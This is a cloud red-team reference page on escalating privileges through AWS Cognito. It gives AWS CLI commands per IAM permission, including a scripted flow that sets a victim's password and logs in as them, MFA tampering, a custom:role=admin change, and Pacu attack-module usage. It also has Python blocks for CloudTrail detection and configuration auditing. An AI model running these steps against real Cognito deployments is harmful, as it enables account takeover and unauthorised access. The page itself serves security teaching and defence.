AWS - Cognito Privesc

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Cognito

For more information about Cognito check:

AWS - Cognito Enum

Gathering credentials from an Identity Pool

As Cognito can grant IAM role credentials to both authenticated and unauthenticated users, if you locate the Identity Pool ID of an application (it should be hardcoded in it) you can obtain new credentials and therefore privesc (inside an AWS account where you probably didn't have any credential before).

For more information check this page.

Potential Impact: Direct privesc to the service role attached to unauth users (and probably to the one attached to auth users).

cognito-identity:SetIdentityPoolRoles, iam:PassRole

With this permission you can grant any cognito role to the authenticated/unauthenticated users of the cognito app.

aws cognito-identity set-identity-pool-roles \
--identity-pool-id <identity_pool_id> \
--roles unauthenticated=<role ARN>

# Get credentials
## Get one ID
aws cognito-identity get-id --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367"
## Get creds for that id
aws cognito-identity get-credentials-for-identity --identity-id "eu-west-2:195f9c73-4789-4bb4-4376-99819b6928374"

If the cognito app doesn't have unauthenticated users enabled you might also need the permission cognito-identity:UpdateIdentityPool to enable them.

Potential Impact: Direct privesc to any cognito role.

cognito-identity:update-identity-pool

An attacker with this permission could, for example, set a Cognito User Pool under his control, or any other identity provider he can log in to, as a way to access this Cognito Identity Pool. Then, simply logging in to that user provider will give him access to the authenticated role configured in the Identity Pool.

# This example is using a Cognito User Pool as identity provider
## but you could use any other identity provider
aws cognito-identity update-identity-pool \
--identity-pool-id <value> \
--identity-pool-name <value> \
[--allow-unauthenticated-identities | --no-allow-unauthenticated-identities] \
--cognito-identity-providers ProviderName=user-pool-id,ClientId=client-id,ServerSideTokenCheck=false

# Now you need to login to the User Pool you have configured
## after having the id token of the login continue with the following commands:

# In this step you should have already an ID Token
aws cognito-identity get-id \
--identity-pool-id <id_pool_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

# Get the identity_id from the previous command response
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

It's also possible to abuse this permission to allow basic auth (the classic flow):

aws cognito-identity update-identity-pool \
--identity-pool-id <value> \
--identity-pool-name <value> \
--allow-unauthenticated-identities \
--allow-classic-flow

Potential Impact: Compromise of the IAM role configured for authenticated users inside the identity pool.

cognito-idp:AdminAddUserToGroup

This permission allows adding a Cognito user to a Cognito group, therefore an attacker could abuse it to add a user under his control to other groups with better privileges or different IAM roles:

aws cognito-idp admin-add-user-to-group \
--user-pool-id <value> \
--username <value> \
--group-name <value>

Potential Impact: Privesc to other Cognito groups and to the IAM roles attached to User Pool Groups.

(cognito-idp:CreateGroup | cognito-idp:UpdateGroup), iam:PassRole

An attacker with these permissions could create/update groups with every IAM role that the compromised Cognito Identity Provider is allowed to use, and make a compromised user part of that group, gaining access to all those IAM roles:

aws cognito-idp create-group --group-name Hacked --user-pool-id <user-pool-id> --role-arn <role-arn>

Potential Impact: Privesc to other Cognito IAM roles.

cognito-idp:AdminConfirmSignUp

This permission allows confirming sign-ups. By default anyone can sign up in Cognito applications; if that is left as is, a user could create an account with any data and confirm it with this permission.

aws cognito-idp admin-confirm-sign-up \
--user-pool-id <value> \
--username <value>

Potential Impact: Indirect privesc to the identity pool IAM role for authenticated users if you can register a new user. Indirect privesc to other app functionalities by being able to confirm any account.

cognito-idp:AdminCreateUser

This permission would grant an attacker the ability to create a new user inside the user pool. The new user is created enabled, but will need to change its password.

aws cognito-idp admin-create-user \
--user-pool-id <value> \
--username <value> \
[--user-attributes <value>] ([Name=email,Value=email@gmail.com]) \
[--validation-data <value>] \
[--temporary-password <value>]

Potential Impact: Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities by being able to create any user.

cognito-idp:AdminEnableUser

This permission can help in the very rare case where an attacker has found the credentials of a disabled user and needs to enable it again.

aws cognito-idp admin-enable-user \
--user-pool-id <value> \
--username <value>

Potential Impact: Indirect privesc to the identity pool IAM role for authenticated users and to the user's permissions, if the attacker had credentials for a disabled user.

cognito-idp:AdminInitiateAuth, cognito-idp:AdminRespondToAuthChallenge

This permission allows logging in with the ADMIN_USER_PASSWORD_AUTH method. For more information follow the link.

cognito-idp:AdminSetUserPassword

This permission would allow an attacker to set a known password for any user, usually resulting in a direct account takeover (especially if the victim doesn't have MFA enabled, or MFA isn't enforced for the relevant auth flow/client).

aws cognito-idp admin-set-user-password \
--user-pool-id <value> \
--username <value> \
--password <value> \
--permanent

Typical flow:

REGION="us-east-1"
USER_POOL_ID="<user_pool_id>"
VICTIM_USERNAME="<victim_username_or_email>"
NEW_PASS='P@ssw0rd-ChangeMe-123!'

# 1) Set a permanent password for the victim (takeover primitive)
aws cognito-idp admin-set-user-password \
--region "$REGION" \
--user-pool-id "$USER_POOL_ID" \
--username "$VICTIM_USERNAME" \
--password "$NEW_PASS" \
--permanent

# 2) Login as the victim against a User Pool App Client (doesn't require AWS creds)
CLIENT_ID="<user_pool_app_client_id>"
aws cognito-idp initiate-auth \
--no-sign-request --region "$REGION" \
--client-id "$CLIENT_ID" \
--auth-flow USER_PASSWORD_AUTH \
--auth-parameters "USERNAME=$VICTIM_USERNAME,PASSWORD=$NEW_PASS"

Related permission: cognito-idp:AdminResetUserPassword can be used to force a password reset flow for the victim (the impact depends on how password recovery is implemented and on what the attacker can capture or control).

Potential Impact: Takeover of any user account; access to app-layer permissions (groups/roles/claims) and to anything that relies on Cognito tokens; potential access to the Identity Pool authenticated IAM roles.

cognito-idp:AdminSetUserSettings | cognito-idp:SetUserMFAPreference | cognito-idp:SetUserPoolMfaConfig | cognito-idp:UpdateUserPool

AdminSetUserSettings: An attacker could abuse this permission to set a phone number he controls as the user's SMS MFA.

aws cognito-idp admin-set-user-settings \
--user-pool-id <value> \
--username <value> \
--mfa-options <value>

SetUserMFAPreference: Similar to the previous one, this permission can be used to change a user's MFA preferences in order to bypass the MFA protection.

aws cognito-idp admin-set-user-mfa-preference \
[--sms-mfa-settings <value>] \
[--software-token-mfa-settings <value>] \
--username <value> \
--user-pool-id <value>

SetUserPoolMfaConfig: Similar to the previous one, this permission can be used to change the MFA configuration of the whole user pool in order to bypass the MFA protection.

aws cognito-idp set-user-pool-mfa-config \
--user-pool-id <value> \
[--sms-mfa-configuration <value>] \
[--software-token-mfa-configuration <value>] \
[--mfa-configuration <value>]

UpdateUserPool: It's also possible to update the user pool to change the MFA policy. Check the cli here.

Potential Impact: Indirect privesc to any user whose credentials the attacker knows; this could allow bypassing the MFA protection.

cognito-idp:AdminUpdateUserAttributes

An attacker with this permission can change any mutable attribute of a User Pool user (including custom:* attributes) to try to gain privileges in the application that runs on top of it.

A common high-impact pattern is claim-based RBAC implemented with custom attributes (for example custom:role=admin). If the application trusts that claim, changing it and then re-authenticating can bypass authorization without touching the application at all.

aws cognito-idp admin-update-user-attributes \
--user-pool-id <value> \
--username <value> \
--user-attributes <value>

Example: escalate your own role and refresh the tokens:

REGION="us-east-1"
USER_POOL_ID="<user_pool_id>"
USERNAME="<your_username>"

# 1) Change the RBAC attribute (example)
aws cognito-idp admin-update-user-attributes \
--region "$REGION" \
--user-pool-id "$USER_POOL_ID" \
--username "$USERNAME" \
--user-attributes Name="custom:role",Value="admin"

# 2) Re-authenticate to obtain a token with updated claims
CLIENT_ID="<user_pool_app_client_id>"
PASSWORD="<your_password>"
aws cognito-idp initiate-auth \
--no-sign-request --region "$REGION" \
--client-id "$CLIENT_ID" \
--auth-flow USER_PASSWORD_AUTH \
--auth-parameters "USERNAME=$USERNAME,PASSWORD=$PASSWORD"

Potential Impact: Indirect privesc in applications that trust Cognito attributes/claims for authorization; ability to modify other security-relevant attributes (for example, setting email_verified or phone_number_verified to true can matter in some apps).
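Detection view of the admin-* user-pool calls and identity-pool changes described in the sections above, as an added example that is not HackTricks or AWS code: it classifies constructed CloudTrail-shaped events, flagging the control-plane calls listed on this page and attribute changes touching custom:* or *_verified. The camelCase requestParameters field names in the samples are an assumption about CloudTrail's layout.

```python
from typing import Optional

# CloudTrail eventNames from the sections above that change who can log in or what a user is
# authorised to do. Constructed watch-list for this example, not an AWS-published list.
WATCH = {
    "cognito-idp.amazonaws.com": {
        "AdminSetUserPassword", "AdminCreateUser", "AdminConfirmSignUp", "AdminEnableUser", "AdminAddUserToGroup",
        "CreateGroup", "UpdateGroup", "AdminSetUserSettings", "AdminSetUserMFAPreference", "SetUserPoolMfaConfig",
        "CreateUserPoolClient", "UpdateUserPoolClient", "CreateIdentityProvider", "UpdateIdentityProvider",
        "CreateUserImportJob", "StartUserImportJob",
    },
    "cognito-identity.amazonaws.com": {"SetIdentityPoolRoles", "UpdateIdentityPool"},
}
# Attribute names whose change affects authorisation in many apps (custom:role, *_verified).
SENSITIVE_ATTRS = ("custom:", "email_verified", "phone_number_verified")

def classify(event: dict) -> Optional[str]:
    """Return an alert reason for one CloudTrail event, or None if it is benign."""
    name = event.get("eventName", "")
    params = event.get("requestParameters") or {}
    if name == "AdminUpdateUserAttributes":
        hit = [a.get("name", "") for a in params.get("userAttributes", [])
               if a.get("name", "").startswith(SENSITIVE_ATTRS)]
        return f"authz-relevant attribute change {hit}" if hit else None
    if name == "UpdateIdentityPool":
        weak = [k for k in ("allowUnauthenticatedIdentities", "allowClassicFlow") if params.get(k)]
        return f"identity pool reconfigured (weakened: {weak or 'none'})"
    if name in WATCH.get(event.get("eventSource", ""), ()):
        return f"privileged Cognito control-plane call {name}"
    return None

def scan(events: list) -> list:
    """Return (eventName, caller ARN, reason) for every event that alerts."""
    alerts = []
    for ev in events:
        reason = classify(ev)
        if reason:
            alerts.append((ev.get("eventName"), (ev.get("userIdentity") or {}).get("arn", "?"), reason))
    return alerts

# Constructed sample events: CloudTrail-shaped, placeholder account/pool IDs.
HELPDESK = {"arn": "arn:aws:iam::111111111111:user/helpdesk"}
SAMPLE_EVENTS = [
    {"eventSource": "cognito-idp.amazonaws.com", "eventName": "AdminSetUserPassword", "userIdentity": HELPDESK,
     "requestParameters": {"userPoolId": "us-east-1_EXAMPLE", "permanent": True}},
    {"eventSource": "cognito-idp.amazonaws.com", "eventName": "AdminUpdateUserAttributes", "userIdentity": HELPDESK,
     "requestParameters": {"userAttributes": [{"name": "custom:role", "value": "admin"}]}},
    {"eventSource": "cognito-identity.amazonaws.com", "eventName": "UpdateIdentityPool",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:role/deploy"},
     "requestParameters": {"allowUnauthenticatedIdentities": True, "allowClassicFlow": True}},
]
```

Every alerting event names its caller ARN, so the next question (is that principal supposed to administer Cognito at all?) can be answered from the same record.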

cognito-idp:CreateUserPoolClient | cognito-idp:UpdateUserPoolClient

An attacker with this permission could create a new User Pool Client that is less restricted than the existing pool clients. For example, the new client could allow any kind of authentication method, have no secret, have token revocation disabled, allow tokens to stay valid for a longer period…

The same could happen if, instead of creating a new client, an existing one is modified.

In the command line (or the update one) you can see all the options, check them out!

aws cognito-idp create-user-pool-client \
--user-pool-id <value> \
--client-name <value> \
[...]

Potential Impact: Indirect privesc to the Identity Pool authenticated role used by the User Pool, by creating a new client that relaxes the security measures and lets the attacker log in with a user he was able to create.
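Configuration check for the relaxations the update-identity-pool and CreateUserPoolClient/UpdateUserPoolClient sections describe, as an added example that is not HackTricks or AWS code: it evaluates the dicts that describe-identity-pool and describe-user-pool-client return, on constructed samples, and reports each weak setting.

```python
"""Audit the Cognito settings the sections above show being weakened (added example,
not HackTricks or AWS code). Inputs are the dicts returned by describe-identity-pool
and describe-user-pool-client; the samples at the bottom are constructed."""

def audit_identity_pool(pool: dict) -> list:
    """Findings for an IdentityPool description (AWS response key names)."""
    findings = []
    if pool.get("AllowUnauthenticatedIdentities"):
        findings.append("AllowUnauthenticatedIdentities: anyone holding the pool ID gets the unauth role")
    if pool.get("AllowClassicFlow"):
        findings.append("AllowClassicFlow: basic (classic) flow enabled, a token can be traded for roles")
    for prov in pool.get("CognitoIdentityProviders", []):
        if not prov.get("ServerSideTokenCheck", False):
            findings.append(f"{prov.get('ProviderName')}: ServerSideTokenCheck=false, "
                            "disabled/deleted users keep access until their token expires")
    return findings

def audit_user_pool_client(client: dict, max_refresh_days: int = 30) -> list:
    """Findings for a UserPoolClient description (the relaxations listed above)."""
    findings = []
    flows = set(client.get("ExplicitAuthFlows", []))
    weak = flows & {"ALLOW_USER_PASSWORD_AUTH", "ALLOW_ADMIN_USER_PASSWORD_AUTH"}
    if weak:
        findings.append(f"plaintext password auth flows enabled: {sorted(weak)}")
    if not client.get("ClientSecret"):
        findings.append("no client secret: any code knowing the ClientId can start auth flows")
    if client.get("EnableTokenRevocation") is False:
        findings.append("EnableTokenRevocation=false: refresh tokens cannot be revoked")
    unit = client.get("TokenValidityUnits", {}).get("RefreshToken", "days")
    if unit == "days" and client.get("RefreshTokenValidity", 30) > max_refresh_days:
        findings.append(f"RefreshTokenValidity={client['RefreshTokenValidity']} days")
    return findings

# Constructed samples shaped like the two describe-* responses (placeholder IDs).
SAMPLE_POOL = {
    "IdentityPoolId": "us-east-1:00000000-0000-0000-0000-000000000000",
    "AllowUnauthenticatedIdentities": True, "AllowClassicFlow": True,
    "CognitoIdentityProviders": [{"ProviderName": "cognito-idp.us-east-1.amazonaws.com/us-east-1_EXAMPLE",
                                  "ClientId": "EXAMPLECLIENTID", "ServerSideTokenCheck": False}],
}
SAMPLE_CLIENT = {
    "ClientId": "EXAMPLECLIENTID", "ClientName": "attacker-friendly",
    "ExplicitAuthFlows": ["ALLOW_USER_PASSWORD_AUTH", "ALLOW_REFRESH_TOKEN_AUTH"],
    "EnableTokenRevocation": False, "RefreshTokenValidity": 3650,
    "TokenValidityUnits": {"RefreshToken": "days"},
}
```

Running both functions over every pool and client in an account (the describe-* calls are paginated with list-identity-pools and list-user-pool-clients) turns the checklist in this section into something you can diff over time.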

cognito-idp:CreateUserImportJob | cognito-idp:StartUserImportJob

An attacker could abuse this permission to create users by uploading a csv with new users.

# Create a new import job
aws cognito-idp create-user-import-job \
--job-name <value> \
--user-pool-id <value> \
--cloud-watch-logs-role-arn <value>

# Use a new import job
aws cognito-idp start-user-import-job \
--user-pool-id <value> \
--job-id <value>

# Both options above will give you a URL where you can send the CSV file with the users to create
curl -v -T "PATH_TO_CSV_FILE" \
-H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL"

(In the case where you create a new import job you might also need the iam passrole permission, I haven't tested it yet).

Potential Impact: Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities by being able to create any user.

cognito-idp:CreateIdentityProvider | cognito-idp:UpdateIdentityProvider

An attacker could create a new identity provider and then be able to login through this provider.

aws cognito-idp create-identity-provider \
--user-pool-id <value> \
--provider-name <value> \
--provider-type <value> \
--provider-details <value> \
[--attribute-mapping <value>] \
[--idp-identifiers <value>]

Potential Impact: Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities by being able to create any user.

cognito-sync:* Analysis

This is a very common permission granted by default in the roles of Cognito Identity Pools. Even if a wildcard in permissions always looks bad (especially coming from AWS), the permissions it grants aren't very useful from an attacker's perspective.

This permission allows reading usage information of Identity Pools and Identity IDs inside Identity Pools (which isn't sensitive information).
Identity IDs could have Datasets assigned to them, which hold session information (AWS describes it as a saved game). It's possible that these contain some kind of sensitive information (but the probability is pretty low). You can find in the enumeration page how to access this information.

An attacker could also use these permissions to enroll himself to a Cognito stream that publishes changes to these datasets, or to a lambda that triggers on cognito events. I haven't seen this being used, and I wouldn't expect sensitive information here, but it's not impossible.

Automatic Tools

  • Pacu, the AWS exploitation framework, now includes the “cognito__enum” and “cognito__attack” modules, which automate the enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.

For a description of the modules' functions see part 2 of the blog post. For installation instructions see the main Pacu page.

Usage

Example cognito__attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client:

Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX

Example cognito__enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account:

Pacu (new:test) > run cognito__enum

  • Cognito Scanner is a CLI tool in python that implements different attacks on Cognito, including privilege escalation.

Installation

$ pip install cognito-scanner

Usage

$ cognito-scanner --help

For more information check https://github.com/padok-team/cognito-scanner
